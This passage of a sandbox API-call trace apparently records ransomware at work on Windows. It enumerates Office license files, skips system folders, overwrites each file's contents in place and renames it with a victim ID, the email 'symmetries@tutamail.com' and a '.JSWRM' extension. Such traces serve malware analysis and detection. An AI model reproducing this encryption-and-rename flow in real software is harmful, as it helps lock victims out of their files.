hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0102.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.868] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xee308135, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee308135, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee37a832, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d7c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessPipcR_Grace-ul-oob.xrm-ms", cAlternateFileName="HOC1AF~1.XRM")) returned 1 [0102.869] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.869] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.869] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.869] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.869] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.869] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.869] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0102.869] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.869] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.869] lstrcmpiW (lpString1="HomeBusinessPipcR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0102.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_Grace-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0102.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_Grace-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessPipcR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0102.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0102.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0102.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_Grace-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0102.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_Grace-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessPipcR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0102.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0102.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0102.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0102.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0102.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.870] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11644) returned 1 [0102.870] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0102.870] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0102.873] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.873] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0102.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.874] CloseHandle (hObject=0x45c) returned 1 [0102.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0102.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0102.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0102.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0102.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0102.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0102.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.874] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0102.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0102.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0102.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.875] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec691f40, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec691f40, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec750afb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29b7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessPipcR_OEM_Perp-pl.xrm-ms", cAlternateFileName="HO4E4E~1.XRM")) returned 1 [0102.875] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0102.875] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0102.875] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0102.875] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0102.875] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned -1 [0102.875] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned -1 [0102.875] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0102.875] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.875] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned -1 [0102.875] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned -1 [0102.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0102.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_OEM_Perp-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0102.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_OEM_Perp-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessPipcR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0102.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0102.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0102.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_OEM_Perp-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0102.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_OEM_Perp-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessPipcR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0102.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0102.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0102.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0102.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0102.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.876] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10679) returned 1 [0102.876] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29b0) returned 0x24c1d0 [0102.876] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x29b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x29b0, lpOverlapped=0x0) returned 1 [0102.879] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.879] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x29b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x29b0, lpOverlapped=0x0) returned 1 [0102.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.879] CloseHandle (hObject=0x45c) returned 1 [0102.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0102.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0102.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0102.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0102.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0102.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0102.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.880] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0102.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0102.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0102.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.881] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xee308135, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee308135, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee4131cf, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x55d9, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="HOCD27~1.XRM")) returned 1 [0102.887] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0102.887] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0102.887] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0102.887] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0102.887] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned -1 [0102.887] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned -1 [0102.887] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0102.887] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.887] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned -1 [0102.887] lstrcmpiW (lpString1="HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned -1 [0102.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0102.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0102.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0102.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0102.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0102.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0102.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d298, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0102.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0102.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0102.888] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0102.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0102.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinesspipcr_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.888] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21977) returned 1 [0102.888] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.888] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x55d0) returned 0x24c1d0 [0102.888] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x55d0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x55d0, lpOverlapped=0x0) returned 1 [0102.891] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.891] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x55d0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x55d0, lpOverlapped=0x0) returned 1 [0102.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.891] CloseHandle (hObject=0x45c) returned 1 [0102.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0102.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0102.892] MultiByteToWideChar (in: 